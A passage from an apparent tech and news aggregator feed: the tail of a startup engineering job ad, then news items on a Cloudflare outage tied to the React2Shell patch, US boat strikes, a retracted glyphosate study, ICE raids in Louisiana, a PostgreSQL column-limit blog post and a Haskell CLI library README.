  2. You believe everyone deserves a second chance. You treat everyone with dignity. You know how to meet people exactly where they are—with empathy and compassion—helping create a space where everyone feels seen and valued, regardless of their background.
  3. You identify yourself as a cracked engineer. You love finding a way or making one. You take extreme ownership of ideas, driving them to completion even when others need convincing. Every time you hit a wall, you think of three new ways to solve the issue.
  4. You are tech-forward, but not tech-first. You look for ways to automate and scale, but you know not everything should be automated. You believe that with the right builder mindset, one coach can support hundreds of individuals—but you also understand that in a program like ours, many moments require a human touch. You know when to hand it to a system, and when to pick up the phone.
  5. You are entrepreneurial. You’re scrappy, resourceful, autonomous, and low-maintenance. You know process matters—but at this stage, speed and iteration matter more. You’re comfortable building quickly and changing procedures often to get to the right solution. You roll up your sleeves and solve problems. No job is too small.
  6. You play to win. You stay optimistic when things get tough and keep moving when others slow down. You’re not rattled by change or new ideas. You don’t need to agree with everything, but you bring a “yes, and” mindset that helps ideas grow instead of shutting them down.
  7. You work hard . You show up early, stay late, and do what needs to get done—no ego, no excuses. You don’t wait around or ask for permission. This isn’t a 9-to-5. The team puts in 10+ hour days because we care about the mission and each other. If that sounds miserable, this isn’t for you. If it sounds exciting, you’ll fit right in.
  8. You are a straight shooter. You don’t shy away from hard conversations—internally or externally. You bring clarity, care, and accountability to every interaction.
  9. You love learning. You understand that recent advancements in AI have shifted the way we work and what it means to be a high performer. You tinker with new tools. You enjoy being an early adopter. You’re always rethinking and optimizing how you work so you can keep leveling up. Nobody needs to tell you to keep upping your game.
  10. You have an eye for operational detail. This doesn’t mean you’re simply organized. At Emerge, operational excellence isn’t just about efficiency—it’s about protecting the real lives and futures of the people in our programs. You have an almost paranoid attention to detail, because you understand that even small oversights have real, human consequences.
  11. You are a clear writer. This doesn’t mean you need to craft the next great novel, but you must communicate ideas simply and clearly. You value precision, clarity, and brevity. You understand that good writing reduces confusion, accelerates decisions, and ensures everyone stays aligned, especially in high-stakes environments like ours.
  12. You are a strong prompter. You’ve seen firsthand how a few thoughtful prompts can transform messy tasks into scalable, repeatable AI workflows. You love tinkering with prompts, contexts, and configurations to get exactly the right outputs, and you take pride in turning cutting-edge AI into practical processes that anyone can use.

Requirements

  • Willing to relocate and work in-person in New York City
  • Experience taking a project from 0 to 1. You might have led a project, been a founder previously, built an impressive side project, or been one of the first 10 employees at an early stage startup
  • You love working with React and Typescript
  • Experience with Figma
  • Experience collaborating with operations or support teams

Bonus Points

  • Experience in ed-tech
  • Experience with UX research

What you will be doing

  • Coaching students. You’ll support students throughout their training journey—not just by building tools, but by directly engaging with them. This means texting, calling, and helping students one-on-one when needed. At the same time, you’ll take what you learn from those interactions and turn it into scalable systems and smart automations. You’ll be doing both engineering and non-engineering work to make sure students succeed and the product keeps improving.
  • Talking to students. Good founding engineers read feedback and iterate quickly. Great founding engineers have users they're friendly with, talk with them frequently, bounce ideas off them, and iterate with them when they ship new things.
  • Doing support . This is an engineering role with key program management responsibilities. You’ll work directly with students every day. That requires patience, empathy, and a willingness to meet people where they are. You’ll help investigate and resolve product issues, and you’ll take ownership of making the product better through what you learn.
  • Documenting your work and its impact. Our work is complex, spans months, and involves multiple teams. Clear documentation and communication are critical. You’ll be responsible for creating awareness when a change impacts operations, and for helping others understand how features affect different parts of training and service delivery. Precision matters.
  • Owning products and features end to end . You won’t just take tickets. You’ll originate ideas based on user conversations, your own instincts, and our larger strategy. You’ll test MVPs in production, iterate based on real feedback, and stay accountable to the long-term success of your work. We build in React and TypeScript. If you like shipping for the sake of it, this role isn’t for you. If you like shipping with purpose and ownership, you’ll love it here.
  • Implementing AI features and operational workflows . This is last for a reason. We don’t jump to automation. We do things manually first to fully understand the problem—then we build. If you care about applying AI meaningfully, not just for hype, this is the right place.

Benefits You’ll Receive: link

Start Date: ASAP

About the interview

  1. Application
  2. Cultural fit conversation & technical screen (60 min)
  3. Getting to know you interview (60 min): A more in-depth discussion about your background, experiences, and goals.
  4. Reference checks. We will select 3–4 people you’ve worked with and request introductions. We will request these when the time comes. We’re looking for honest and raw references, not flawless ones.
  5. Paid Work Trial (2-5 days). You’ll come onsite to work on a real project, with access to internal tools and team collaboration. You’ll be paid $500 per day. All travel expenses will be covered.

About Emerge Career

Emerge Career

Founded: 2022

Batch: S22

Team Size: 3

Status: Active


Cloudflare blames today's outage on emergency React2Shell patch

Bleeping Computer
www.bleepingcomputer.com
2025-12-05 13:53:26
Cloudflare has blamed today's outage on the emergency patching of a critical React remote code execution vulnerability, which is now actively exploited in attacks. [...]...
Original Article


Earlier today, Cloudflare experienced a widespread outage that caused websites and online platforms worldwide to go down, returning a "500 Internal Server Error" message.

In a status page update, the internet infrastructure company has now blamed the incident on an emergency patch designed to address a critical remote code execution vulnerability in React Server Components, which is now actively exploited in attacks.

"A change made to how Cloudflare's Web Application Firewall parses requests caused Cloudflare's network to be unavailable for several minutes this morning," Cloudflare said .

"This was not an attack; the change was deployed by our team to help mitigate the industry-wide vulnerability disclosed this week in React Server Components. We will share more information as we have it today."

Tracked as CVE-2025-55182, this maximum severity security flaw (dubbed React2Shell) affects the React open-source JavaScript library for web and native user interfaces, as well as dependent React frameworks such as Next.js, React Router, Waku, @parcel/rsc, @vitejs/plugin-rsc, and RedwoodSDK.

The vulnerability was found in the React Server Components (RSC) 'Flight' protocol, and it allows unauthenticated attackers to gain remote code execution in React and Next.js applications by sending maliciously crafted HTTP requests to React Server Function endpoints.

While multiple React packages in their default configuration (i.e., react-server-dom-parcel, react-server-dom-turbopack, and react-server-dom-webpack) are vulnerable, the flaw only affects React versions 19.0, 19.1.0, 19.1.1, and 19.2.0 released during the past year.

Ongoing React2Shell exploitation

Although the impact is not as widespread as initially believed, security researchers with Amazon Web Services (AWS) have reported that multiple China-linked hacking groups (including Earth Lamia and Jackpot Panda) have begun exploiting the React2Shell vulnerability hours after the max-severity flaw was disclosed.

The NHS England National CSOC also said on Thursday that several functional CVE-2025-55182 proof-of-concept exploits are already available and warned that "continued successful exploitation in the wild is highly likely."

Last month, Cloudflare experienced another worldwide outage that brought down the company's Global Network for almost 6 hours, an incident described by CEO Matthew Prince as the "worst outage since 2019."

Cloudflare fixed another massive outage in June, which caused Access authentication failures and Zero Trust WARP connectivity issues across multiple regions, and also impacted Google Cloud's infrastructure.


"Alejandro Was Murdered": Colombian Fisherman's Family Files Claim Against U.S. over Boat Strike

Democracy Now!
www.democracynow.org
2025-12-05 13:51:34
The U.S. military said Thursday that it blew up another boat of suspected drug smugglers, this time killing four people in the eastern Pacific. The U.S. has now killed at least 87 people in 22 strikes since September. The U.S. has not provided proof as to the vessels’ activities or the identit...
Original Article

The U.S. military said Thursday that it blew up another boat of suspected drug smugglers, this time killing four people in the eastern Pacific. The U.S. has now killed at least 87 people in 22 strikes since September. The U.S. has not provided proof as to the vessels’ activities or the identities of those on board who were targeted, but now the family of a fisherman from Colombia has filed the first legal challenge to the military strikes. In a petition filed with the Inter-American Commission on Human Rights, the family says a strike on September 15 killed 42-year-old Alejandro Andres Carranza Medina, a fisherman from Santa Marta and father of four. His family says he was fishing for tuna and marlin off Colombia’s Caribbean coast when his boat was bombed, and was not smuggling drugs.

“Alejandro was murdered,” says international human rights attorney Dan Kovalik, who filed the legal petition on behalf of the family. “This is not how a civilized nation should act, just murdering people on the high seas without proof, without trial.”


Please check back later for full transcript.

The original content of this program is licensed under a Creative Commons Attribution-Noncommercial-No Derivative Works 3.0 United States License . Please attribute legal copies of this work to democracynow.org. Some of the work(s) that this program incorporates, however, may be separately licensed. For further information or additional permissions, contact us.

Influential study on glyphosate safety retracted 25 years after publication

Hacker News
www.lemonde.fr
2025-12-05 13:39:04
Comments...
Original Article

A widely cited 2000 study concluding that the well-known herbicide glyphosate was safe has just been officially disavowed by the journal that published it. The scientists are suspected of having signed a text actually prepared by Monsanto.

A person holds up a sign during a protest against the authorization of glyphosate-based herbicide, in Rennes, on October 12, 2023.

A quarter-century after its publication, one of the most influential research articles on the potential carcinogenicity of glyphosate has been retracted for "several critical issues that are considered to undermine the academic integrity of this article and its conclusions." In a retraction notice dated Friday, November 28, the journal Regulatory Toxicology and Pharmacology announced that the study, published in April 2000 and concluding the herbicide was safe, has been removed from its archives. The disavowal comes 25 years after publication and eight years after thousands of internal Monsanto documents were made public during US court proceedings (the "Monsanto Papers"), revealing that the actual authors of the article were not the listed scientists – Gary M. Williams (New York Medical College), Robert Kroes (Ritox, Utrecht University, Netherlands), and Ian C. Munro (Intertek Cantox, Canada) – but rather Monsanto employees.

Known as "ghostwriting," this practice is considered a form of scientific fraud. It involves companies paying researchers to sign their names to research articles they did not write. The motivation is clear: When a study supports the safety of a pesticide or drug, it appears far more credible if not authored by scientists employed by the company marketing the product.



Trump Calls Somali Community "Garbage": Minnesota Responds to Racist Rant and Immigration Sweeps

Democracy Now!
www.democracynow.org
2025-12-05 13:35:00
Federal authorities are carrying out intensified operations this week in Minnesota as President Donald Trump escalates his attacks on the Somali community in the state. The administration halted green card and citizenship applications from Somalis and people from 18 other countries after last week&#...
Original Article

Federal authorities are carrying out intensified operations this week in Minnesota as President Donald Trump escalates his attacks on the Somali community in the state. The administration halted green card and citizenship applications from Somalis and people from 18 other countries after last week’s fatal shooting near the White House. During a recent Cabinet meeting, Trump went on a racist tirade against the Somali community, saying, “We don’t want them in our country,” and referring to Somali immigrants as “garbage.” Minnesota has the largest Somali community in the United States, and the vast majority of the estimated 80,000 residents in the state are American citizens or legal permanent residents.

“We have seen vile things that the president has said, but in these moments, we need to come together and respond,” says Jaylani Hussein, the executive director of CAIR -Minnesota. He also highlights the connections between Trump’s targeting of the community and foreign policy. “If you demonize Muslims, then you can get away with killing Muslims abroad. This has always been the case, from the Afghanistan War to the Iraq War.”



Guests

Please check back later for full transcript.

The original content of this program is licensed under a Creative Commons Attribution-Noncommercial-No Derivative Works 3.0 United States License . Please attribute legal copies of this work to democracynow.org. Some of the work(s) that this program incorporates, however, may be separately licensed. For further information or additional permissions, contact us.

The 1600 columns limit in PostgreSQL - how many columns fit into a table

Lobsters
andreas.scherbaum.la
2025-12-05 13:33:05
Comments...
Original Article

A recent blog posting by Frédéric Delacourt ( Did you know? Tables in PostgreSQL are limited to 1,600 columns ) reminded me once again that in the analytics world customers sometimes ask for more than 1600 columns.

Quick recap: in OLTP, the aim is (usually) to use the 3rd normal form. In OLAP, tables are often only vaguely normalized, and wide or very wide fact tables in 2nd normal form are quite common. But are 1600 columns a bad idea? Yes. Do some applications generate such wide tables? Also yes. I’ve seen my fair share of customer requests and support tickets asking if the 1600 columns limit can be raised or even lifted.
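For anyone who has not run into the limit, it is easy to reproduce: generate a CREATE TABLE with one column too many and the server refuses it. A minimal sketch (table and column names invented), with the error message current PostgreSQL versions emit:

```python
# Generate DDL for a table one column past the limit. Feeding this to
# PostgreSQL fails with: ERROR: tables can have at most 1600 columns
columns = ",\n".join(f"  c{i} boolean" for i in range(1601))
print(f"CREATE TABLE too_wide (\n{columns}\n);")
```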

But is that possible?

Why is there a limit

In PostgreSQL, a single row must fit into a single page on disk. The disk page size, by default, is 8 kB. As Frédéric shows in tests in his blog posting, sometimes even a smaller number of columns does not fit into the page.

Now my analytics background is not only with PostgreSQL, but also with WarehousePG (a Greenplum fork) and with Greenplum itself. In WarehousePG the default page size is 32 kB. Will this increase the number of columns? Unfortunately not:

~/sources/warehouse-pg main]$ grep -e MaxTupleAttributeNumber -e MaxHeapAttributeNumber src/include/access/htup_details.h
#define MaxTupleAttributeNumber 1664    /* 8 * 208 */
#define MaxHeapAttributeNumber  1600    /* 8 * 200 */

The fork is still using the same values for MaxTupleAttributeNumber and MaxHeapAttributeNumber , limited to 1600 columns. There’s also a comment near MaxHeapAttributeNumber in src/include/access/htup_details.h :

 * In any case, depending on column data types you will likely be running
 * into the disk-block-based limit on overall tuple size if you have more
 * than a thousand or so columns.  TOAST won't help.

Is it possible to increase the limit

It is possible to increase these limits and create tables with a couple thousand columns. Theoretically, a single page fits 8136 single-byte columns (like a BOOLEAN) in PostgreSQL. In WarehousePG this even fits 32712 single-byte columns. But that is not the real limit.

The HeapTupleHeader has the t_infomask2 field, a uint16 (unsigned 16-bit integer) defined in access/htup_details.h. Out of the available bits, 11 are used for the number of attributes:

#define HEAP_NATTS_MASK			0x07FF	/* 11 bits for number of attributes */

And 11 bits allows for 2047 attributes. Any tuple can have a maximum of 2047 attributes, even with all the 1600 safeguards increased or removed. In practice, it's 2041 attributes. When inserting into or updating a table, the database will not write more than those 2041 columns; all other columns are not set. If the column definition of the higher columns is NOT NULL, the INSERT or UPDATE fails with a constraint violation. Otherwise the higher columns are simply set to NULL.
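The arithmetic is easy to verify without touching the server; a quick sketch of the mask math (plain Python, nothing PostgreSQL-specific):

```python
# 11 bits of t_infomask2 hold the attribute count, so the hard ceiling is:
HEAP_NATTS_MASK = 0x07FF
assert HEAP_NATTS_MASK == 2 ** 11 - 1 == 2047  # max attributes per tuple
```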

Bottom line: while the table can have many more columns, the database can’t write anything into these additional columns. Not without fully refactoring the way tuples are created internally.

Conclusion

In theory it is possible to raise the 1600 columns limit to a slightly larger number. In practice it is not worth the small gain, and it pushes against internal safety boundaries built into the database.

Also, in practice this will have all kinds of mostly unintended side effects and problems. This is untested territory, and all unit tests must be updated as well. Tools like psql have a built-in limitation too, which must also be raised; this in turn requires always using the patched binary, since it might no longer be possible to use a “standard” psql against this database. Other tools might have problems with very wide tables as well.

Exporting the data is possible, but the table can no longer be imported into an unpatched version of the database. This basically creates a fork of a fork, which must be maintained and updated for every new minor and major version.

tl;dr: Don’t do this.

Thank you

Thanks to Robert Haas for reviewing the code assumptions about larger numbers of columns.





Layoutz – Simple, beautiful CLI output for Haskell 🪶

Lobsters
flora.pm
2025-12-05 13:27:25
Comments...
Original Article

Simple, beautiful CLI output for Haskell 🪶

Build declarative and composable sections, trees, tables, dashboards, and interactive Elm-style TUIs.

Part of d4 • Also in: JavaScript, Scala

Features

  • Zero dependencies, use Layoutz.hs like a header file
  • Rich text formatting: alignment, underlines, padding, margins
  • Lists, trees, tables, charts, spinners...
  • ANSI colors and wide character support
  • Easily create new primitives (no component-library limitations)
  • LayoutzApp for Elm-style TUIs


TaskListDemo.hs SimpleGame.hs


Installation

Add Layoutz on Hackage to your project's .cabal file:

build-depends: layoutz

All you need:

import Layoutz

Quickstart

(1/2) Static rendering - Beautiful, compositional strings:

import Layoutz

demo = layout
  [ center $ row 
      [ withStyle StyleBold $ text "Layoutz"
      , withColor ColorCyan $ underline' "ˆ" $ text "DEMO"
      ]
  , br
  , row
    [ statusCard "Users" "1.2K"
    , withBorder BorderDouble $ statusCard "API" "UP"
    , withColor ColorRed $ withBorder BorderThick $ statusCard "CPU" "23%"
    , withStyle StyleReverse $ withBorder BorderRound $ table ["Name", "Role", "Skills"] 
	[ ["Gegard", "Pugilist", ul ["Armenian", ul ["bad", ul["man"]]]]
        , ["Eve", "QA", "Testing"]
        ]
    ]
  ]

putStrLn $ render demo

(2/2) Interactive apps - Build Elm-style TUIs:

import Layoutz

data Msg = Inc | Dec

counterApp :: LayoutzApp Int Msg
counterApp = LayoutzApp
  { appInit = (0, None)
  , appUpdate = \msg count -> case msg of
      Inc -> (count + 1, None)
      Dec -> (count - 1, None)
  , appSubscriptions = \_ -> onKeyPress $ \key -> case key of
      CharKey '+' -> Just Inc
      CharKey '-' -> Just Dec
      _           -> Nothing
  , appView = \count -> layout
      [ section "Counter" [text $ "Count: " <> show count]
      , ul ["Press '+' or '-'", "ESC to quit"]
      ]
  }

main = runApp counterApp

Why layoutz?

  • We have printf and full-blown TUI libraries - but there's a gap in-between
  • layoutz is a tiny, declarative DSL for structured CLI output
  • On the side, it has a little Elm-style runtime + keyhandling DSL to animate your elements, much like a flipbook...
    • But you can just use Layoutz without any of the TUI stuff

Core concepts

  • Every piece of content is an Element
  • Elements are immutable and composable - build complex layouts by combining simple elements
  • A layout arranges elements vertically:
layout [elem1, elem2, elem3]  -- Joins with "\n"

Call render on any element to get a string

The power comes from uniform composition - since everything has the Element typeclass, everything can be combined.
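For example, a box containing a row of status cards renders like any other element (both are documented below):

putStrLn $ render $ box "Stats"
  [ row [statusCard "Users" "1.2K", statusCard "API" "UP"] ]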

String Literals

With OverloadedStrings enabled, you can use string literals directly:

layout ["Hello", "World"]  -- Instead of layout [text "Hello", text "World"]

Note: When passing to functions that take polymorphic Element a parameters (like underline', center', pad), use text explicitly:

underline' "=" $ text "Title"  -- Correct
underline' "=" "Title"         -- Ambiguous type error

Elements

Text

text "Simple text"
-- Or with OverloadedStrings:
"Simple text"
Simple text

Line Break

Add line breaks with br :

layout ["Line 1", br, "Line 2"]
Line 1

Line 2

Section: section

section "Config" [kv [("env", "prod")]]
section' "-" "Status" [kv [("health", "ok")]]
section'' "#" "Report" 5 [kv [("items", "42")]]
=== Config ===
env: prod

--- Status ---
health: ok

##### Report #####
items: 42

Layout (vertical): layout

layout ["First", "Second", "Third"]
First
Second
Third

Row (horizontal): row

Arrange elements side-by-side horizontally:

row ["Left", "Middle", "Right"]
Left Middle Right

Multi-line elements are aligned at the top:

row 
  [ layout ["Left", "Column"]
  , layout ["Middle", "Column"]
  , layout ["Right", "Column"]
  ]

Tight Row: tightRow

Like row, but with no spacing between elements (useful for gradients and progress bars):

tightRow [withColor ColorRed $ text "█", withColor ColorGreen $ text "█", withColor ColorBlue $ text "█"]
███

Text alignment: alignLeft , alignRight , alignCenter , justify

Align text within a specified width:

layout
  [ alignLeft 40 "Left aligned"
  , alignCenter 40 "Centered"
  , alignRight 40 "Right aligned"
  , justify 40 "This text is justified evenly"
  ]
Left aligned                            
               Centered                 
                           Right aligned
This  text  is  justified         evenly

Horizontal rule: hr

hr
hr' "~"
hr'' "-" 10
──────────────────────────────────────────────────
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
----------

Vertical rule: vr

row [vr, vr' "║", vr'' "x" 5]
│ ║ x
│ ║ x
│ ║ x
│ ║ x
│ ║ x
│ ║
│ ║
│ ║
│ ║
│ ║

Key-value pairs: kv

kv [("name", "Alice"), ("role", "admin")]
name: Alice
role: admin

Table: table

Tables automatically handle alignment and borders:

table ["Name", "Age", "City"] 
  [ ["Alice", "30", "New York"]
  , ["Bob", "25", ""]
  , ["Charlie", "35", "London"]
  ]
┌─────────┬─────┬─────────┐
│ Name    │ Age │ City    │
├─────────┼─────┼─────────┤
│ Alice   │ 30  │ New York│
│ Bob     │ 25  │         │
│ Charlie │ 35  │ London  │
└─────────┴─────┴─────────┘

Unordered Lists: ul

Clean unordered lists with automatic nesting:

ul ["Feature A", "Feature B", "Feature C"]
• Feature A
• Feature B
• Feature C

Nested lists with auto-styling:

ul [ "Backend"
   , ul ["API", "Database"]
   , "Frontend"
   , ul ["Components", ul ["Header", ul ["Footer"]]]
   ]
• Backend
  ◦ API
  ◦ Database
• Frontend
  ◦ Components
    ▪ Header
      • Footer

Ordered Lists: ol

Numbered lists with automatic nesting:

ol ["First step", "Second step", "Third step"]
1. First step
2. Second step
3. Third step

Nested ordered lists with automatic style cycling (numbers → letters → roman numerals):

ol [ "Setup"
   , ol ["Install dependencies", "Configure", ol ["Check version"]]
   , "Build"
   , "Deploy"
   ]
1. Setup
  a. Install dependencies
  b. Configure
    i. Check version
2. Build
3. Deploy

Underline: underline

Add underlines to any element:

underline "Important Title"
underline' "=" $ text "Custom"  -- Use text for custom underline char
Important Title
───────────────

Custom
══════

Box: box

With title:

box "Summary" [kv [("total", "42")]]
┌──Summary───┐
│ total: 42  │
└────────────┘

Without title:

box "" [kv [("total", "42")]]
┌────────────┐
│ total: 42  │
└────────────┘

Status card: statusCard

statusCard "CPU" "45%"
┌───────┐
│ CPU   │
│ 45%   │
└───────┘

Progress bar: inlineBar

inlineBar "Download" 0.75
Download [███████████████─────] 75%

Tree: tree

tree "Project" 
  [ branch "src" 
      [ leaf "main.hs"
      , leaf "test.hs"
      ]
  , branch "docs"
      [ leaf "README.md"
      ]
  ]
Project
├── src
│   ├── main.hs
│   └── test.hs
└── docs
    └── README.md

Chart: chart

chart [("Web", 10), ("Mobile", 20), ("API", 15)]
Web    │████████████████████ 10
Mobile │████████████████████████████████████████ 20
API    │██████████████████████████████ 15

Padding: pad

Add uniform padding around any element:

pad 2 $ text "content"
        
        
  content  
        
        

Spinners: spinner

Animated loading spinners for TUI apps:

spinner "Loading..." frameNum SpinnerDots
spinner "Processing" frameNum SpinnerLine
spinner "Working" frameNum SpinnerClock
spinner "Thinking" frameNum SpinnerBounce

Styles:

  • SpinnerDots - Braille dot spinner: ⠋ ⠙ ⠹ ⠸ ⠼ ⠴ ⠦ ⠧ ⠇ ⠏
  • SpinnerLine - Classic line spinner: | / - \
  • SpinnerClock - Clock face spinner: 🕐 🕑 🕒 ...
  • SpinnerBounce - Bouncing dots: ⠁ ⠂ ⠄ ⠂

Increment the frame number on each render to animate:

-- In your app state, track a frame counter
data AppState = AppState { spinnerFrame :: Int, ... }

-- In your view function
spinner "Loading" (spinnerFrame state) SpinnerDots

-- In your update function (triggered by a tick or key press)
state { spinnerFrame = spinnerFrame state + 1 }

With colors:

withColor ColorGreen $ spinner "Success!" frame SpinnerDots
withColor ColorYellow $ spinner "Warning" frame SpinnerLine

Centering: center

Smart auto-centering and manual width:

center "Auto-centered"     -- Uses layout context
center' 20 "Manual width"  -- Fixed width
        Auto-centered        

    Manual width    

Margin: margin

Add prefix margins to elements for compiler-style error messages:

margin "[error]"
  [ text "Ooops"
  , text ""
  , row [ text "result :: Int = "
        , underline' "^" $ text "getString"
        ]
  , text "Expected Int, found String"
  ]
[error] Ooops
[error]
[error] result :: Int =  getString
[error]                  ^^^^^^^^^
[error] Expected Int, found String

Border Styles

Elements like box, table, and statusCard support different border styles:

BorderNormal (default):

box "Title" ["content"]
┌──Title──┐
│ content │
└─────────┘

BorderDouble :

withBorder BorderDouble $ statusCard "API" "UP"
╔═══════╗
║ API   ║
║ UP    ║
╚═══════╝

BorderThick :

withBorder BorderThick $ table ["Name"] [["Alice"]]
┏━━━━━━━┓
┃ Name  ┃
┣━━━━━━━┫
┃ Alice ┃
┗━━━━━━━┛

BorderRound :

withBorder BorderRound $ box "Info" ["content"]
╭──Info───╮
│ content │
╰─────────╯

BorderNone (invisible borders):

withBorder BorderNone $ box "Info" ["content"]
  Info   
 content 
         

Colors (ANSI Support)

Add ANSI colors to any element:

layout[
  withColor ColorRed $ text "The quick brown fox...",
  withColor ColorBrightCyan $ text "The quick brown fox...",
  underlineColored "~" ColorRed $ text "The quick brown fox...",
  margin "[INFO]" [withColor ColorCyan $ text "The quick brown fox..."]
]

Standard Colors:

  • ColorBlack ColorRed ColorGreen ColorYellow ColorBlue ColorMagenta ColorCyan ColorWhite
  • ColorBrightBlack ColorBrightRed ColorBrightGreen ColorBrightYellow ColorBrightBlue ColorBrightMagenta ColorBrightCyan ColorBrightWhite
  • ColorNoColor (for conditional formatting)

Extended Colors:

  • ColorFull n - 256-color palette (0-255)
  • ColorTrue r g b - 24-bit RGB true color

Color Gradients

Create beautiful gradients with extended colors:

let palette   = tightRow $ map (\i -> withColor (ColorFull i) $ text "█") [16, 19..205]
    redToBlue = tightRow $ map (\i -> withColor (ColorTrue i 100 (255 - i)) $ text "█") [0, 4..255]
    greenFade = tightRow $ map (\i -> withColor (ColorTrue 0 (255 - i) i) $ text "█") [0, 4..255]
    rainbow   = tightRow $ map colorBlock [0, 4..255]
      where
        colorBlock i =
          let r = if i < 128 then i * 2 else 255
              g = if i < 128 then 255 else (255 - i) * 2
              b = if i > 128 then (i - 128) * 2 else 0
          in withColor (ColorTrue r g b) $ text "█"

putStrLn $ render $ layout [palette, redToBlue, greenFade, rainbow]

Styles (ANSI Support)

Add ANSI styles to any element:

layout[
  withStyle StyleBold $ text "The quick brown fox...",
  withColor ColorRed $ withStyle StyleBold $ text "The quick brown fox...",
  withStyle StyleReverse $ withStyle StyleItalic $ text "The quick brown fox..."
]

Styles:

  • StyleBold StyleDim StyleItalic StyleUnderline
  • StyleBlink StyleReverse StyleHidden StyleStrikethrough
  • StyleNoStyle (for conditional formatting)

Combining Styles:

Use <> to combine multiple styles at once:

layout[
  withStyle (StyleBold <> StyleItalic <> StyleUnderline) $ text "The quick brown fox...",
  withStyle (StyleBold <> StyleReverse) $ text "The quick brown fox..."
]

You can also combine colors and styles:

withColor ColorBrightYellow $ withStyle (StyleBold <> StyleItalic) $ text "The quick brown fox..."

Custom Components

Create your own components by implementing the Element typeclass

data Square = Square Int

instance Element Square where
  renderElement (Square size) 
    | size < 2 = ""
    | otherwise = intercalate "\n" (top : middle ++ [bottom])
    where
      w = size * 2 - 2
      top = "┌" ++ replicate w '─' ++ "┐"
      middle = replicate (size - 2) ("│" ++ replicate w ' ' ++ "│")
      bottom = "└" ++ replicate w '─' ++ "┘"

-- Helper to avoid wrapping with L
square :: Int -> L
square n = L (Square n)

-- Use it like any other element
putStrLn $ render $ row
  [ square 3
  , square 5
  , square 7
  ]
┌────┐ ┌────────┐ ┌────────────┐
│    │ │        │ │            │
└────┘ │        │ │            │
       │        │ │            │
       └────────┘ │            │
                  │            │
                  └────────────┘

REPL

Drop into GHCi to experiment:

cabal repl
λ> :set -XOverloadedStrings
λ> import Layoutz
λ> putStrLn $ render $ center $ box "Hello" ["World!"]
┌──Hello──┐
│ World!  │
└─────────┘
λ> putStrLn $ render $ table ["A", "B"] [["1", "2"]]
┌───┬───┐
│ A │ B │
├───┼───┤
│ 1 │ 2 │
└───┴───┘

Interactive Apps

Build Elm-style terminal applications with the built-in TUI runtime.

import Layoutz

data Msg = Inc | Dec

counterApp :: LayoutzApp Int Msg
counterApp = LayoutzApp
  { appInit = (0, None)
  , appUpdate = \msg count -> case msg of
      Inc -> (count + 1, None)
      Dec -> (count - 1, None)
  , appSubscriptions = \_ -> onKeyPress $ \key -> case key of
      CharKey '+' -> Just Inc
      CharKey '-' -> Just Dec
      _           -> Nothing
  , appView = \count -> layout
      [ section "Counter" [text $ "Count: " <> show count]
      , ul ["Press '+' or '-'", "ESC to quit"]
      ]
  }

main = runApp counterApp

How the Runtime Works

The runApp function spawns three daemon threads:

  • Render thread - Continuously renders appView state to terminal (~30fps)
  • Input thread - Reads keys, maps via appSubscriptions , calls appUpdate
  • Command thread - Executes Cmd side effects async, feeds results back

As per the above, commands run without blocking the UI.

Press ESC to exit.

LayoutzApp state msg

data LayoutzApp state msg = LayoutzApp
  { appInit          :: (state, Cmd msg)                 -- Initial state + startup command
  , appUpdate        :: msg -> state -> (state, Cmd msg) -- Pure state transitions
  , appSubscriptions :: state -> Sub msg                 -- Event sources
  , appView          :: state -> L                       -- Render to UI
  }

Subscriptions

Subscription                     Description
onKeyPress (Key -> Maybe msg)    Keyboard input
onTick msg                       Periodic ticks (~100ms) for animations
batch [sub1, sub2, ...]          Combine subscriptions
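A hedged sketch combining both event sources (Tick and Quit are assumed constructors in your Msg type):

data Msg = Tick | Quit

subs :: state -> Sub Msg
subs _ = batch
  [ onTick Tick                      -- periodic ticks drive animations
  , onKeyPress $ \key -> case key of
      CharKey 'q' -> Just Quit
      _           -> Nothing
  ]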

Commands

Command                        Description
None                           No effect
Cmd (IO (Maybe msg))           Run IO, optionally produce message
Batch [cmd1, cmd2, ...]        Multiple commands
cmd :: IO () -> Cmd msg        Fire and forget
cmdMsg :: IO msg -> Cmd msg    IO that returns a message

Example: Logger with file I/O

import Layoutz

data Msg = Log | Saved
data State = State { count :: Int, status :: String }

loggerApp :: LayoutzApp State Msg
loggerApp = LayoutzApp
  { appInit = (State 0 "Ready", None)
  , appUpdate = \msg s -> case msg of
      Log   -> (s { count = count s + 1 },
                cmdMsg $ do
                  appendFile "log.txt" ("Entry " <> show (count s) <> "\n")
                  pure Saved)  -- produce Saved so the status line updates
      Saved -> (s { status = "Saved!" }, None)
  , appSubscriptions = \_ -> onKeyPress $ \key -> case key of
      CharKey 'l' -> Just Log
      _           -> Nothing
  , appView = \s -> layout
      [ section "Logger" [text $ "Entries: " <> show (count s)]
      , text (status s)
      , ul ["'l' to log", "ESC to quit"]
      ]
  }

main = runApp loggerApp

Key Types

CharKey Char       -- 'a', '1', ' '
EnterKey, BackspaceKey, TabKey, EscapeKey, DeleteKey
ArrowUpKey, ArrowDownKey, ArrowLeftKey, ArrowRightKey
SpecialKey String  -- "Ctrl+C", etc.

Inspiration

5,000 Arrests? ICE Descends on Louisiana to Carry Out Raids in World's "Incarceration Capital"

Democracy Now!
www.democracynow.org
2025-12-05 13:24:43
A major immigration crackdown is underway in New Orleans and the surrounding areas of Louisiana, dubbed “Operation Catahoula Crunch” by the Trump administration. According to planning documents, 250 federal agents will aim to make 5,000 arrests over two months. Homeland Security Secretar...
Original Article

This is a rush transcript. Copy may not be in its final form.

AMY GOODMAN : This is Democracy Now!, democracynow.org, The War and Peace Report. I’m Amy Goodman.

We turn now to New Orleans and southeast Louisiana, where more than 250 federal immigration agents launched Operation Catahoula Crunch this week. They reportedly aim to make more than 5,000 arrests over two months.

Homeland Security Secretary Kristi Noem says the operation will target, quote, “the worst of the worst,” unquote. But local officials say they’re skeptical. City Councilmember Lesli Harris responded, quote, “There are nowhere near 5,000 violent offenders in our region. … What we’re seeing instead are mothers, teenagers, and workers being detained during routine check-ins, from their homes and places of work.” So far, agents have targeted the parking lots of home improvement stores like Home Depot and workers at construction sites.

At a New Orleans City Council hearing Thursday, about 30 protesters were removed after demanding city leaders do more to protect immigrants, calling for ICE-free zones. In a public comment session, residents went to the microphone one by one and were cut off when it was clear they wanted to talk about immigration, which was not on the formal agenda. This is Mich González of SouthEast Dignity Not Detention Coalition. After his mic was cut, he continued to try to be heard.

MICH GONZÁLEZ: We delivered a letter to City Council on November 21st. I’m part of the SouthEast Dignity Not Detention Coalition, and we requested a meeting. This should be on the agenda. It should be on the agenda.

CHAIR : Not germane.
